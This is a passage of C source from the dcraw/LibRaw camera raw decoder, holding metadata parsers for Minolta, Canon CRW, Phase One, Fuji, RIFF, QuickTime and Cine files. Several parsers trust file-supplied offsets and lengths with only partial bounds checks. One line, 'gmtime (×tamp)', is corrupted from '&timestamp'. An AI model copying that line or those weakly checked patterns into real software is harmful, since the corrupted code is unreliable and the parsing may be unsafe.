if (model[0] == 'N') load_flags = 80;
} else if (raw_width*raw_height*3 == tiff_ifd[raw].bytes) {
load_raw = &CLASS nikon_yuv_load_raw;
gamma_curve (1/2.4, 12.92, 1, 4095);
memset (cblack, 0, sizeof cblack);
filters = 0;
} else if (raw_width*raw_height*2 == tiff_ifd[raw].bytes) {
load_raw = &CLASS unpacked_load_raw;
load_flags = 4;
order = 0x4d4d;
} else
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width*raw_height*3 == tiff_ifd[raw].bytes*2)
{
load_raw = &CLASS packed_load_raw;
load_flags=80;
}
else if(tiff_ifd[raw].rows_per_strip && tiff_ifd[raw].strip_offsets_count &&
tiff_ifd[raw].strip_offsets_count == tiff_ifd[raw].strip_byte_counts_count)
{
int fit = 1;
for(int i = 0; i < tiff_ifd[raw].strip_byte_counts_count-1; i++) // all but last
if(tiff_ifd[raw].strip_byte_counts[i]*2 != tiff_ifd[raw].rows_per_strip*raw_width*3)
{
fit = 0;
break;
}
if(fit)
load_raw = &CLASS nikon_load_striped_packed_raw;
else
load_raw = &CLASS nikon_load_raw; // fallback
}
else
#endif
load_raw = &CLASS nikon_load_raw; break;
case 65535:
load_raw = &CLASS pentax_load_raw; break;
case 65000:
switch (tiff_ifd[raw].phint) {
case 2: load_raw = &CLASS kodak_rgb_load_raw; filters = 0; break;
case 6: load_raw = &CLASS kodak_ycbcr_load_raw; filters = 0; break;
case 32803: load_raw = &CLASS kodak_65000_load_raw;
}
case 32867: case 34892: break;
#ifdef LIBRAW_LIBRARY_BUILD
case 8: break;
#endif
default: is_raw = 0;
}
if (!dng_version)
if ( ((tiff_samples == 3 && tiff_ifd[raw].bytes && tiff_bps != 14 &&
(tiff_compress & -16) != 32768)
|| (tiff_bps == 8 && strncmp(make,"Phase",5) &&
!strcasestr(make,"Kodak") &&
!strstr(model2,"DEBUG RAW")))
&& strncmp(software,"Nikon Scan",10))
is_raw = 0;
for (i=0; i < tiff_nifds; i++)
if (i != raw
&& (tiff_ifd[i].samples == max_samp || (tiff_ifd[i].comp == 7 && tiff_ifd[i].samples == 1)) /* Allow 1-bps JPEGs */
&& tiff_ifd[i].bps>0 && tiff_ifd[i].bps < 33
&& tiff_ifd[i].phint != 32803
&& tiff_ifd[i].phint != 34892
&& unsigned(tiff_ifd[i].t_width | tiff_ifd[i].t_height) < 0x10000 &&
tiff_ifd[i].t_width * tiff_ifd[i].t_height / (SQR(tiff_ifd[i].bps)+1) >
thumb_width * thumb_height / (SQR(thumb_misc)+1)
&& tiff_ifd[i].comp != 34892) {
thumb_width = tiff_ifd[i].t_width;
thumb_height = tiff_ifd[i].t_height;
thumb_offset = tiff_ifd[i].offset;
thumb_length = tiff_ifd[i].bytes;
thumb_misc = tiff_ifd[i].bps;
thm = i;
}
if (thm >= 0) {
thumb_misc |= tiff_ifd[thm].samples << 5;
switch (tiff_ifd[thm].comp) {
case 0:
write_thumb = &CLASS layer_thumb;
break;
case 1:
if (tiff_ifd[thm].bps <= 8)
write_thumb = &CLASS ppm_thumb;
else if (!strncmp(make,"Imacon",6))
write_thumb = &CLASS ppm16_thumb;
else
thumb_load_raw = &CLASS kodak_thumb_load_raw;
break;
case 65000:
thumb_load_raw = tiff_ifd[thm].phint == 6 ?
&CLASS kodak_ycbcr_load_raw : &CLASS kodak_rgb_load_raw;
}
}
}
void CLASS parse_minolta (int base)
{
int save, tag, len, offset, high=0, wide=0, i, c;
short sorder=order;
fseek (ifp, base, SEEK_SET);
if (fgetc(ifp) || fgetc(ifp)-'M' || fgetc(ifp)-'R') return;
order = fgetc(ifp) * 0x101;
offset = base + get4() + 8;
#ifdef LIBRAW_LIBRARY_BUILD
if(offset>ifp->size()-8) // At least 8 bytes for tag/len
offset = ifp->size()-8;
#endif
while ((save=ftell(ifp)) < offset) {
for (tag=i=0; i < 4; i++)
tag = tag << 8 | fgetc(ifp);
len = get4();
if(len < 0)
return; // just ignore wrong len?? or raise bad file exception?
switch (tag) {
case 0x505244: /* PRD */
fseek (ifp, 8, SEEK_CUR);
high = get2();
wide = get2();
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0x524946: /* RIF */
if (!strncasecmp(model,"DSLR-A100", 9))
{
fseek(ifp, 8, SEEK_CUR);
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][2] = get2();
get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][3] = 0x100;
}
break;
#endif
case 0x574247: /* WBG */
get4();
i = strcmp(model,"DiMAGE A200") ? 0:3;
FORC4 cam_mul[c ^ (c >> 1) ^ i] = get2();
break;
case 0x545457: /* TTW */
parse_tiff (ftell(ifp));
data_offset = offset;
}
fseek (ifp, save+len+8, SEEK_SET);
}
raw_height = high;
raw_width = wide;
order = sorder;
}
/*
Many cameras have a "debug mode" that writes JPEG and raw
at the same time. The raw file has no header, so try to
to open the matching JPEG file and read its metadata.
*/
void CLASS parse_external_jpeg()
{
const char *file, *ext;
char *jname, *jfile, *jext;
#ifndef LIBRAW_LIBRARY_BUILD
FILE *save=ifp;
#else
#if defined(_WIN32) && !defined(__MINGW32__) && defined(_MSC_VER) && (_MSC_VER > 1310)
if(ifp->wfname())
{
std::wstring rawfile(ifp->wfname());
rawfile.replace(rawfile.length()-3,3,L"JPG");
if(!ifp->subfile_open(rawfile.c_str()))
{
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
ifp->subfile_close();
}
else
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
return;
}
#endif
if(!ifp->fname())
{
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
return;
}
#endif
ext = strrchr (ifname, '.');
file = strrchr (ifname, '/');
if (!file) file = strrchr (ifname, '\\');
#ifndef LIBRAW_LIBRARY_BUILD
if (!file) file = ifname-1;
#else
if (!file) file = (char*)ifname-1;
#endif
file++;
if (!ext || strlen(ext) != 4 || ext-file != 8) return;
jname = (char *) malloc (strlen(ifname) + 1);
merror (jname, "parse_external_jpeg()");
strcpy (jname, ifname);
jfile = file - ifname + jname;
jext = ext - ifname + jname;
if (strcasecmp (ext, ".jpg")) {
strcpy (jext, isupper(ext[1]) ? ".JPG":".jpg");
if (isdigit(*file)) {
memcpy (jfile, file+4, 4);
memcpy (jfile+4, file, 4);
}
} else
while (isdigit(*--jext)) {
if (*jext != '9') {
(*jext)++;
break;
}
*jext = '0';
}
#ifndef LIBRAW_LIBRARY_BUILD
if (strcmp (jname, ifname)) {
if ((ifp = fopen (jname, "rb"))) {
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Reading metadata from %s ...\n"), jname);
#endif
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
fclose (ifp);
}
}
#else
if (strcmp (jname, ifname))
{
if(!ifp->subfile_open(jname))
{
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
ifp->subfile_close();
}
else
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
}
#endif
if (!timestamp)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("Failed to read metadata from %s\n"), jname);
#endif
}
free (jname);
#ifndef LIBRAW_LIBRARY_BUILD
ifp = save;
#endif
}
/*
CIFF block 0x1030 contains an 8x8 white sample.
Load this into white[][] for use in scale_colors().
*/
void CLASS ciff_block_1030()
{
static const ushort key[] = { 0x410, 0x45f3 };
int i, bpp, row, col, vbits=0;
unsigned long bitbuf=0;
if ((get2(),get4()) != 0x80008 || !get4()) return;
bpp = get2();
if (bpp != 10 && bpp != 12) return;
for (i=row=0; row < 8; row++)
for (col=0; col < 8; col++) {
if (vbits < bpp) {
bitbuf = bitbuf << 16 | (get2() ^ key[i++ & 1]);
vbits += 16;
}
white[row][col] = bitbuf >> (vbits -= bpp) & ~(-1 << bpp);
}
}
/*
Parse a CIFF file, better known as Canon CRW format.
*/
void CLASS parse_ciff (int offset, int length, int depth)
{
int tboff, nrecs, c, type, len, save, wbi=-1;
ushort key[] = { 0x410, 0x45f3 };
fseek (ifp, offset+length-4, SEEK_SET);
tboff = get4() + offset;
fseek (ifp, tboff, SEEK_SET);
nrecs = get2();
if ((nrecs | depth) > 127) return;
while (nrecs--) {
type = get2();
len = get4();
save = ftell(ifp) + 4;
fseek (ifp, offset+get4(), SEEK_SET);
if ((((type >> 8) + 8) | 8) == 0x38) {
parse_ciff (ftell(ifp), len, depth+1); /* Parse a sub-table */
}
#ifdef LIBRAW_LIBRARY_BUILD
if (type == 0x3004) parse_ciff (ftell(ifp), len, depth+1);
#endif
if (type == 0x0810)
fread (artist, 64, 1, ifp);
if (type == 0x080a) {
fread (make, 64, 1, ifp);
fseek (ifp, strbuflen(make) - 63, SEEK_CUR);
fread (model, 64, 1, ifp);
}
if (type == 0x1810) {
width = get4();
height = get4();
pixel_aspect = int_to_float(get4());
flip = get4();
}
if (type == 0x1835) /* Get the decoder table */
tiff_compress = get4();
if (type == 0x2007) {
thumb_offset = ftell(ifp);
thumb_length = len;
}
if (type == 0x1818) {
shutter = libraw_powf64(2.0f, -int_to_float((get4(),get4())));
aperture = libraw_powf64(2.0f, int_to_float(get4())/2);
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CurAp = aperture;
#endif
}
if (type == 0x102a) {
// iso_speed = pow (2.0, (get4(),get2())/32.0 - 4) * 50;
iso_speed = libraw_powf64(2.0f, ((get2(),get2()) + get2())/32.0f - 5.0f) * 100.0f;
#ifdef LIBRAW_LIBRARY_BUILD
aperture = _CanonConvertAperture((get2(),get2()));
imgdata.lens.makernotes.CurAp = aperture;
#else
aperture = libraw_powf64(2.0, (get2(),(short)get2())/64.0);
#endif
shutter = libraw_powf64(2.0,-((short)get2())/32.0);
wbi = (get2(),get2());
if (wbi > 17) wbi = 0;
fseek (ifp, 32, SEEK_CUR);
if (shutter > 1e6) shutter = get2()/10.0;
}
if (type == 0x102c) {
if (get2() > 512) { /* Pro90, G1 */
fseek (ifp, 118, SEEK_CUR);
FORC4 cam_mul[c ^ 2] = get2();
} else { /* G2, S30, S40 */
fseek (ifp, 98, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get2();
}
}
#ifdef LIBRAW_LIBRARY_BUILD
if (type == 0x10a9)
{
INT64 o = ftell(ifp);
fseek (ifp, (0x5<<1), SEEK_CUR);
Canon_WBpresets(0,0);
fseek(ifp,o,SEEK_SET);
}
if (type == 0x102d)
{
INT64 o = ftell(ifp);
Canon_CameraSettings();
fseek(ifp,o,SEEK_SET);
}
if (type == 0x580b)
{
if (strcmp(model,"Canon EOS D30")) sprintf(imgdata.shootinginfo.BodySerial, "%d", len);
else sprintf(imgdata.shootinginfo.BodySerial, "%0x-%05d", len>>16, len&0xffff);
}
#endif
if (type == 0x0032) {
if (len == 768) { /* EOS D30 */
fseek (ifp, 72, SEEK_CUR);
FORC4
{
ushort q = get2();
cam_mul[c ^ (c >> 1)] = q? 1024.0 / get2() : 1024;
}
if (!wbi) cam_mul[0] = -1; /* use my auto white balance */
} else if (!cam_mul[0]) {
if (get2() == key[0]) /* Pro1, G6, S60, S70 */
c = (strstr(model,"Pro1") ?
"012346000000000000":"01345:000000006008")[LIM(0,wbi,17)]-'0'+ 2;
else { /* G3, G5, S45, S50 */
c = "023457000000006000"[LIM(0,wbi,17)]-'0';
key[0] = key[1] = 0;
}
fseek (ifp, 78 + c*8, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get2() ^ key[c & 1];
if (!wbi) cam_mul[0] = -1;
}
}
if (type == 0x10a9) { /* D60, 10D, 300D, and clones */
if (len > 66) wbi = "0134567028"[LIM(0,wbi,9)]-'0';
fseek (ifp, 2 + wbi*8, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
}
if (type == 0x1030 && wbi>=0 && (0x18040 >> wbi & 1))
ciff_block_1030(); /* all that don't have 0x10a9 */
if (type == 0x1031) {
raw_width = (get2(),get2());
raw_height = get2();
}
if (type == 0x501c) {
iso_speed = len & 0xffff;
}
if (type == 0x5029) {
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CurFocal = len >> 16;
imgdata.lens.makernotes.FocalType = len & 0xffff;
if (imgdata.lens.makernotes.FocalType == 2) {
imgdata.lens.makernotes.CanonFocalUnits = 32;
if(imgdata.lens.makernotes.CanonFocalUnits>1)
imgdata.lens.makernotes.CurFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
focal_len = imgdata.lens.makernotes.CurFocal;
#else
focal_len = len >> 16;
if ((len & 0xffff) == 2) focal_len /= 32;
#endif
}
if (type == 0x5813) flash_used = int_to_float(len);
if (type == 0x5814) canon_ev = int_to_float(len);
if (type == 0x5817) shot_order = len;
if (type == 0x5834)
{
unique_id = len;
#ifdef LIBRAW_LIBRARY_BUILD
setCanonBodyFeatures(unique_id);
#endif
}
if (type == 0x580e) timestamp = len;
if (type == 0x180e) timestamp = get4();
#ifdef LOCALTIME
if ((type | 0x4000) == 0x580e)
timestamp = mktime (gmtime (×tamp));
#endif
fseek (ifp, save, SEEK_SET);
}
}
void CLASS parse_rollei()
{
char line[128], *val;
struct tm t;
fseek (ifp, 0, SEEK_SET);
memset (&t, 0, sizeof t);
do {
fgets (line, 128, ifp);
if ((val = strchr(line,'=')))
*val++ = 0;
else
val = line + strbuflen(line);
if (!strcmp(line,"DAT"))
sscanf (val, "%d.%d.%d", &t.tm_mday, &t.tm_mon, &t.tm_year);
if (!strcmp(line,"TIM"))
sscanf (val, "%d:%d:%d", &t.tm_hour, &t.tm_min, &t.tm_sec);
if (!strcmp(line,"HDR"))
thumb_offset = atoi(val);
if (!strcmp(line,"X "))
raw_width = atoi(val);
if (!strcmp(line,"Y "))
raw_height = atoi(val);
if (!strcmp(line,"TX "))
thumb_width = atoi(val);
if (!strcmp(line,"TY "))
thumb_height = atoi(val);
} while (strncmp(line,"EOHD",4));
data_offset = thumb_offset + thumb_width * thumb_height * 2;
t.tm_year -= 1900;
t.tm_mon -= 1;
if (mktime(&t) > 0)
timestamp = mktime(&t);
strcpy (make, "Rollei");
strcpy (model,"d530flex");
write_thumb = &CLASS rollei_thumb;
}
void CLASS parse_sinar_ia()
{
int entries, off;
char str[8], *cp;
order = 0x4949;
fseek (ifp, 4, SEEK_SET);
entries = get4();
fseek (ifp, get4(), SEEK_SET);
while (entries--) {
off = get4(); get4();
fread (str, 8, 1, ifp);
if (!strcmp(str,"META")) meta_offset = off;
if (!strcmp(str,"THUMB")) thumb_offset = off;
if (!strcmp(str,"RAW0")) data_offset = off;
}
fseek (ifp, meta_offset+20, SEEK_SET);
fread (make, 64, 1, ifp);
make[63] = 0;
if ((cp = strchr(make,' '))) {
strcpy (model, cp+1);
*cp = 0;
}
raw_width = get2();
raw_height = get2();
load_raw = &CLASS unpacked_load_raw;
thumb_width = (get4(),get2());
thumb_height = get2();
write_thumb = &CLASS ppm_thumb;
maximum = 0x3fff;
}
void CLASS parse_phase_one (int base)
{
unsigned entries, tag, type, len, data, save, i, c;
float romm_cam[3][3];
char *cp;
memset (&ph1, 0, sizeof ph1);
fseek (ifp, base, SEEK_SET);
order = get4() & 0xffff;
if (get4() >> 8 != 0x526177) return; /* "Raw" */
fseek (ifp, get4()+base, SEEK_SET);
entries = get4();
get4();
while (entries--) {
tag = get4();
type = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, base+data, SEEK_SET);
switch (tag) {
#ifdef LIBRAW_LIBRARY_BUILD
case 0x0102:
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if ((imgdata.shootinginfo.BodySerial[0] == 0x4c) && (imgdata.shootinginfo.BodySerial[1] == 0x49)) {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[2] & 0x3f)) - 0x41;
} else {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[1] & 0x3f)) - 0x41;
}
setPhaseOneFeatures(unique_id);
break;
case 0x0401:
if (type == 4) imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
else imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, (getreal(type)/2.0f));
break;
case 0x0403:
if (type == 4) imgdata.lens.makernotes.CurFocal = int_to_float(data);
else imgdata.lens.makernotes.CurFocal = getreal(type);
break;
case 0x0410:
stmread(imgdata.lens.makernotes.body, len, ifp);
break;
case 0x0412:
stmread(imgdata.lens.makernotes.Lens, len, ifp);
break;
case 0x0414:
if (type == 4) {
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
} else {
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, (getreal(type) / 2.0f));
}
break;
case 0x0415:
if (type == 4) {
imgdata.lens.makernotes.MinAp4CurFocal = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
} else {
imgdata.lens.makernotes.MinAp4CurFocal = libraw_powf64(2.0f, (getreal(type) / 2.0f));
}
break;
case 0x0416:
if (type == 4) {
imgdata.lens.makernotes.MinFocal = int_to_float(data);
} else {
imgdata.lens.makernotes.MinFocal = getreal(type);
}
if (imgdata.lens.makernotes.MinFocal > 1000.0f)
{
imgdata.lens.makernotes.MinFocal = 0.0f;
}
break;
case 0x0417:
if (type == 4) {
imgdata.lens.makernotes.MaxFocal = int_to_float(data);
} else {
imgdata.lens.makernotes.MaxFocal = getreal(type);
}
break;
#endif
case 0x100: flip = "0653"[data & 3]-'0'; break;
case 0x106:
for (i=0; i < 9; i++)
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.P1_color[0].romm_cam[i]=
#endif
((float *)romm_cam)[i] = getreal(11);
romm_coeff (romm_cam);
break;
case 0x107:
FORC3 cam_mul[c] = getreal(11);
break;
case 0x108: raw_width = data; break;
case 0x109: raw_height = data; break;
case 0x10a: left_margin = data; break;
case 0x10b: top_margin = data; break;
case 0x10c: width = data; break;
case 0x10d: height = data; break;
case 0x10e: ph1.format = data; break;
case 0x10f: data_offset = data+base; break;
case 0x110: meta_offset = data+base;
meta_length = len; break;
case 0x112: ph1.key_off = save - 4; break;
case 0x210: ph1.tag_210 = int_to_float(data); break;
case 0x21a: ph1.tag_21a = data; break;
case 0x21c: strip_offset = data+base; break;
case 0x21d: ph1.t_black = data; break;
case 0x222: ph1.split_col = data; break;
case 0x223: ph1.black_col = data+base; break;
case 0x224: ph1.split_row = data; break;
case 0x225: ph1.black_row = data+base; break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0x226:
for (i=0; i < 9; i++)
imgdata.color.P1_color[1].romm_cam[i] = getreal(11);
break;
#endif
case 0x301:
model[63] = 0;
fread (model, 1, 63, ifp);
if ((cp = strstr(model," camera"))) *cp = 0;
}
fseek (ifp, save, SEEK_SET);
}
#ifdef LIBRAW_LIBRARY_BUILD
if (!imgdata.lens.makernotes.body[0] && !imgdata.shootinginfo.BodySerial[0]) {
fseek (ifp, meta_offset, SEEK_SET);
order = get2();
fseek (ifp, 6, SEEK_CUR);
fseek (ifp, meta_offset+get4(), SEEK_SET);
entries = get4(); get4();
while (entries--) {
tag = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, meta_offset+data, SEEK_SET);
if (tag == 0x0407) {
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if ((imgdata.shootinginfo.BodySerial[0] == 0x4c) && (imgdata.shootinginfo.BodySerial[1] == 0x49)) {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[2] & 0x3f)) - 0x41;
} else {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[1] & 0x3f)) - 0x41;
}
setPhaseOneFeatures(unique_id);
}
fseek (ifp, save, SEEK_SET);
}
}
#endif
load_raw = ph1.format < 3 ?
&CLASS phase_one_load_raw : &CLASS phase_one_load_raw_c;
maximum = 0xffff;
strcpy (make, "Phase One");
if (model[0]) return;
switch (raw_height) {
case 2060: strcpy (model,"LightPhase"); break;
case 2682: strcpy (model,"H 10"); break;
case 4128: strcpy (model,"H 20"); break;
case 5488: strcpy (model,"H 25"); break;
}
}
void CLASS parse_fuji (int offset)
{
unsigned entries, tag, len, save, c;
fseek (ifp, offset, SEEK_SET);
entries = get4();
if (entries > 255)
return;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_PARSEFUJI_PROCESSED;
#endif
while (entries--)
{
tag = get2();
len = get2();
save = ftell(ifp);
if (tag == 0x100) {
raw_height = get2();
raw_width = get2();
} else if (tag == 0x121) {
height = get2();
if ((width = get2()) == 4284) width += 3;
} else if (tag == 0x130) {
fuji_layout = fgetc(ifp) >> 7;
fuji_width = !(fgetc(ifp) & 8);
} else if (tag == 0x131) {
filters = 9;
FORC(36)
{
int q = fgetc(ifp);
xtrans_abs[0][35 - c] = MAX(0,MIN(q,2)); /* & 3;*/
}
} else if (tag == 0x2ff0) {
FORC4 cam_mul[c ^ 1] = get2();
}
// IB start
#ifdef LIBRAW_LIBRARY_BUILD
else if (tag == 0x9650)
{
short a = (short)get2();
float b =fMAX(1.0f, get2());
imgdata.makernotes.fuji.FujiExpoMidPointShift = a / b;
} else if (tag == 0x2100) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ 1] = get2();
} else if (tag == 0x2200) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ 1] = get2();
} else if (tag == 0x2300) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ 1] = get2();
} else if (tag == 0x2301) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ 1] = get2();
} else if (tag == 0x2302) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][c ^ 1] = get2();
} else if (tag == 0x2310) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ 1] = get2();
} else if (tag == 0x2400) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ 1] = get2();
}
#endif
// IB end
else if (tag == 0xc000) {
c = order;
order = 0x4949;
if ((tag = get4()) > 10000) tag = get4();
if (tag > 10000) tag = get4();
width = tag;
height = get4();
#ifdef LIBRAW_LIBRARY_BUILD
libraw_internal_data.unpacker_data.posRAFData = save;
libraw_internal_data.unpacker_data.lenRAFData = (len>>1);
#endif
order = c;
}
fseek (ifp, save+len, SEEK_SET);
}
height <<= fuji_layout;
width >>= fuji_layout;
}
int CLASS parse_jpeg (int offset)
{
int len, save, hlen, mark;
fseek (ifp, offset, SEEK_SET);
if (fgetc(ifp) != 0xff || fgetc(ifp) != 0xd8) return 0;
while (fgetc(ifp) == 0xff && (mark = fgetc(ifp)) != 0xda) {
order = 0x4d4d;
len = get2() - 2;
save = ftell(ifp);
if (mark == 0xc0 || mark == 0xc3 || mark == 0xc9) {
fgetc(ifp);
raw_height = get2();
raw_width = get2();
}
order = get2();
hlen = get4();
if (get4() == 0x48454150
#ifdef LIBRAW_LIBRARY_BUILD
&& (save+hlen) >= 0 && (save+hlen)<=ifp->size()
#endif
) /* "HEAP" */
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
#endif
parse_ciff (save+hlen, len-hlen, 0);
}
if (parse_tiff (save+6)) apply_tiff();
fseek (ifp, save+len, SEEK_SET);
}
return 1;
}
void CLASS parse_riff()
{
unsigned i, size, end;
char tag[4], date[64], month[64];
static const char mon[12][4] =
{ "Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec" };
struct tm t;
order = 0x4949;
fread (tag, 4, 1, ifp);
size = get4();
end = ftell(ifp) + size;
if (!memcmp(tag,"RIFF",4) || !memcmp(tag,"LIST",4)) {
int maxloop = 1000;
get4();
while (ftell(ifp)+7 < end && !feof(ifp) && maxloop--)
parse_riff();
} else if (!memcmp(tag,"nctg",4)) {
while (ftell(ifp)+7 < end) {
i = get2();
size = get2();
if ((i+1) >> 1 == 10 && size == 20)
get_timestamp(0);
else fseek (ifp, size, SEEK_CUR);
}
} else if (!memcmp(tag,"IDIT",4) && size < 64) {
fread (date, 64, 1, ifp);
date[size] = 0;
memset (&t, 0, sizeof t);
if (sscanf (date, "%*s %s %d %d:%d:%d %d", month, &t.tm_mday,
&t.tm_hour, &t.tm_min, &t.tm_sec, &t.tm_year) == 6) {
for (i=0; i < 12 && strcasecmp(mon[i],month); i++);
t.tm_mon = i;
t.tm_year -= 1900;
if (mktime(&t) > 0)
timestamp = mktime(&t);
}
} else
fseek (ifp, size, SEEK_CUR);
}
void CLASS parse_qt (int end)
{
unsigned save, size;
char tag[4];
order = 0x4d4d;
while (ftell(ifp)+7 < end) {
save = ftell(ifp);
if ((size = get4()) < 8) return;
fread (tag, 4, 1, ifp);
if (!memcmp(tag,"moov",4) ||
!memcmp(tag,"udta",4) ||
!memcmp(tag,"CNTH",4))
parse_qt (save+size);
if (!memcmp(tag,"CNDA",4))
parse_jpeg (ftell(ifp));
fseek (ifp, save+size, SEEK_SET);
}
}
void CLASS parse_smal (int offset, int fsize)
{
int ver;
fseek (ifp, offset+2, SEEK_SET);
order = 0x4949;
ver = fgetc(ifp);
if (ver == 6)
fseek (ifp, 5, SEEK_CUR);
if (get4() != fsize) return;
if (ver > 6) data_offset = get4();
raw_height = height = get2();
raw_width = width = get2();
strcpy (make, "SMaL");
sprintf (model, "v%d %dx%d", ver, width, height);
if (ver == 6) load_raw = &CLASS smal_v6_load_raw;
if (ver == 9) load_raw = &CLASS smal_v9_load_raw;
}
void CLASS parse_cine()
{
unsigned off_head, off_setup, off_image, i;
order = 0x4949;
fseek (ifp, 4, SEEK_SET);
is_raw = get2() == 2;
fseek (ifp, 14, SEEK_CUR);
is_raw *= get4();
off_head = get4();
off_setup = get4();
off_image = get4();
timestamp = get4();
if ((i = get4())) timestamp = i;
fseek (ifp, off_head+4, SEEK_SET);
raw_width = get4();
raw_height = get4();
switch (get2(),get2()) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 16: load_raw = &CLASS unpacked_load_raw;
}
fseek (ifp, off_setup+792, SEEK_SET);
strcpy (make, "CINE");
sprintf (model, "%d", get4());
fseek (ifp, 12, SEEK_CUR);
switch ((i=get4()) & 0xffffff) {
case 3: filters = 0x94949494; break;
case 4: filters = 0x49494949; break;
default: is_raw = 0;
}
fseek (ifp, 72, SEEK_CUR);
switch ((get4()+3600) % 360) {
case 270: flip = 4; break;
case 180: flip = 1; break;
case 90: flip = 7; break;
case 0: flip = 2;
}
cam_mul[0] = getreal(11);
cam_mul[2] = getreal(11);
maximum = ~((~0u) << get4());
fseek (ifp, 668, SEEK_CUR);
shutter = get4()/1000000000.0;
fseek (ifp, off_image, SEEK_SET);
if (shot_select < is_raw)
